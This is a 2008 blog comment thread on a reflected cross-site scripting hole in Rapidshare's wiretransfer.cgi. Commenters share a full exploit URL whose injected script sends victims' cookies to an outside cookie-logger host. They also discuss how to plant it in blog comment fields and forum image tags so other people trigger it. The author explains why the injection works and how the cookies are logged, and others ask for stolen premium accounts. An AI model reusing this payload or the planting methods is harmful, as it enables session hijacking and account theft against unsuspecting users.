Comments on: I Own Your Rapidshare Accounts

By: Dronen

Dronen — Wed, 06 Aug 2008 22:37:30 +0000

Fixed on 06-Aug-2008

By: N00b

N00b — Wed, 06 Aug 2008 19:29:06 +0000

I hear that rapidshare have fixed this exploit now :(

Wondered why i couldnt get it to work!!

Is there any other way to do this?

By: Steph

Steph — Wed, 30 Jul 2008 17:47:15 +0000

It’s okay, I figured it out by trying it myself. The requests are logged in the Raw Access log on my server :3

But I’m not sure how I can embed this code on a webpage. I tried to post it on my blog to test it. I posted it in the "website" field in a comment, like this :

http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20"http://www.wasabite.com/cookielogger/rapidshare/?c="%20%2B%20escape(document.cookie);}))()%3C/script%3E

The link appears correctly in the status bar but when I click on it, but it shows up like this in the URL bar :
" rel="nofollow">http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345"> <== See the ?c= %2B escape part… there is no "+"

I also tried on a forum using bbCode.
[img size=150]http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22%3E%3Cscript%3E((function()%20{new%20Image().src%20=%20"http://www.wasabite.com/cookielogger/rapidshare/?c="%20%2B%20escape(document.cookie);}))()%3C/script%3E[/img]

I have absolutely no clue if it will work. I’ve never worked with JavaScript before, so I don’t know anything about it. The only thing I know is C++ that is very similar to JS.

By: Steph

Steph — Wed, 30 Jul 2008 10:34:32 +0000

Cool thanks!
But now… how do you access the info logged on your server? Is it just in a log that logs all the requests to your server, so when someone requests the image object source, the request for the source is recorded in your log?
It’s the only bit I’m not sure to understand, where the info is recorded.
Thanks! :3

By: Giorgio

Giorgio — Wed, 30 Jul 2008 06:34:23 +0000

@Steph: All correct. [injection] is working because the Rapidshare CGI script echoes it back like it is, so the thing is rendered as a client side script. I log the cookie to my server by creating an Image object and using the URL for my logger as its src property: that URL is immediately loaded in background. @newbie: No purpose for the parentheses around the function, other than readability: it means create this function but evaluate it in a string context, just like calling its toString() method. var [login, pwd] = is a destructuring assignment.

By: newbie

newbie — Wed, 30 Jul 2008 04:41:55 +0000

Hi Giorgio. What is the purpose for those parenthesis around the function in your injection variable? Also, what is this thing with the braces called: var [login, pwd] ? Thanks

By: Steph

Steph — Sun, 27 Jul 2008 14:35:03 +0000

[injection] contains the hidden script that sends the info right?
[iframe] contains the iframe right?
When it gets to iframe.src, it takes the info from the rapidshare account and does [injection] right?

So now the only thing I need to understand is how [injection] is working and how you’re logging the info on your server.

By: MORON BASHA

MORON BASHA — Sat, 26 Jul 2008 21:16:14 +0000

(Sigh)………Vishal, you’re a moron.

Nobody will ever give you free rapidshare premium. Of course I have some fake
rapidshare premium logins for you to download if you want to bolster my points,
so my RS account can pay for itself. By all means you can have em.

Just let me know. ROFL!

Dont want that? Awww thats too bad, because thats the closest you
will ever get to getting a RS Premium account by begging people on sites.
Save you’re effort, kid - spend that effort on finding a JOB, so you can
PURCHASE a RS Premium account like the rest of us.

The fact that we have one and you don’t is not anyone else’s problem. Its yours.

By: vishal

vishal — Tue, 22 Jul 2008 16:27:58 +0000

can anybody provide me a free rapidshare premium accounts i tried wht u code it don’t understand how to implament it. so can anybody plz give any premium accounts .
you can send mail to my mail id prudencevishal@aol.com

By: while true {true=false}

while true {true=false} — Mon, 21 Jul 2008 17:35:41 +0000

>> augianempire@gmail.com

Added to spam lists =-)